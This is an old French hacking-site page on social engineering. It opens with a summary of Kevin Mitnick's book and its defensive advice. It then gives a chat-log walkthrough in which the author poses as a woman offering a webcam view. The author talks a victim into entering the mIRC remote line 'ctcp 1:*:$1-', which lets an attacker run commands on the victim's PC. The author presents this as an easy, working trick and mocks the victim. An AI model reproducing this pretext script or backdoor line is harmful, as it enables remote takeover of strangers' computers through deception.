 |
||||||||||||||||||||||
|
|
|
 |
|
|
|
le social engineering est pour certaine personne une manière de hack pour d’autre non ! je vous ai fait le résumé d’un article que j’ai trouver et ensuite j’ai mit un petit example de ce procédé sous mirc ... (ca marche plus souvent qu’on le pense y’a des centaine de con sur le net.) . |
|
|
|
Le social engineering Le social engineering est un moyen comme un autre d'obtenir des informations auxquelles normalement l'accès nous est interdit. Kevin Mitnick, un hacker qui s'était donné la réputation de pouvoir déclencher une guerre nucléaire juste en sifflant trois notes dans un téléphone, explique dans son livre, "The Art Of Deception ", qui signifie "l'art de la tromperie", ce qu'est le social engineering. C'est un terme peu connu du grand public. Il s'agit d'arriver à mettre en confiance une personne pour qu'elle fasse ensuite ce que vous avez envie qu'elle fasse. Pour cela, le social engineer cherche toutes les informations qu'il peut trouver sur l'entreprise, brochures, textes de presse, le système d'exploitation utilisé, etc… . Ensuite il va contacter quelqu'un de l'entreprise, un employé qui travaille depuis peu de temps pour celle-ci. Car une nouvelle recrue connaît moins bien ses collègues, ses supérieurs et sera plus coopérative, croyant faire valoir ses compétences de travail en équipe. Arrivé à ce stade, tout est joué. Vous pouvez récupérer ce que vous voulez grace à votre victime. Kevin Mitnick, dans son livre, raconte les tactiques que lui ou d'autres ont utilisées pour réussir à compromettre plusieurs entreprises. Il dit avoir choisi comme nom pour son livre "The Art of Deception" pour rendre hommage au légendaire traité "sun tzu the art of war" (l'art de la guerre). Il espère que les personnes qui vont lire son livre ne se feront pas avoir par des personnes pratiquant le social engineering. Juste en se méfiant un peu, par exemple si la personne ne vous laisse pas son numéro de téléphone pour que vous la rappeliez, de se poser quelques questions comme: "pourquoi moi ? " ou "est-ce habituel ou inhabituel?" et faire bien attention à ce qu'une personne que vous ne connaissez pas vous demande de faire. L'auteur du livre avoue même que lui aussi s'est déjà fait piéger par un "social engineer". Personne n'est à l'abri de se faire piéger par un social engineer, alors prendre quelques précautions ne peut pas faire de mal. OsIrIsS un exemple sur le chat par exemple avec 2 personne ayant mirc le but étant la de lui faire tapé des ligne de commande pour pouvoir prendre le controle de son pc !les ligne sont les suivante : ctcp 1:*:$1- voila ce qu'il faut faire tapé a la victime dans les remote de son script la personne a qui avec qui j'ai fait ce log se reconaitra! désoler pour lui y me fallé un exemple j'ai réduit le dialogue du début lé ca va tout ca ne servant a rien pour l'exemple osiriss>salut couillon>slt osiriss>asv ? (pour ce qui connaise pas age,sexe et ville) couillon> 22H13 et toi osiriss>23F62 (normalement par exemple pour moi chui un mec !!) couillon>t'a une webcam ? osiriss> oui mais le problème c'est que mon netmeeting ne marche pas ! si tu veut me voir fodré que tu tape un truc dans mirc couillon>ok y fo que je fasse quoi ?(j'ai po mit ce pseudo pour l'example pour rien) osiriss>tu fé file =>remote=>new et la tu tape:" ctcp 1:*:$1-" tu fé ok et tu pourra me voir couillon> c'est fait ET VOILA y vous suffit d'avoir ctcp controleur pour mirc et même en y connésant rien au hack vous pouvez controler le pc de votre "couillon" et faut pas croit y'en a plus qu'on le croit.
|
|
|
|
[page d'acceuil] [nous] [chat] [concours] [fragland] [cavadrava] [Download] [article divers] [hacking] [adresse ip] [le nuking] [le spoofing] [troyen] [hacker un site] [mail bombing] [pirater un serveur] [virus] [social engineering] [mail] [liens] [livre d'or] |
|
|
 |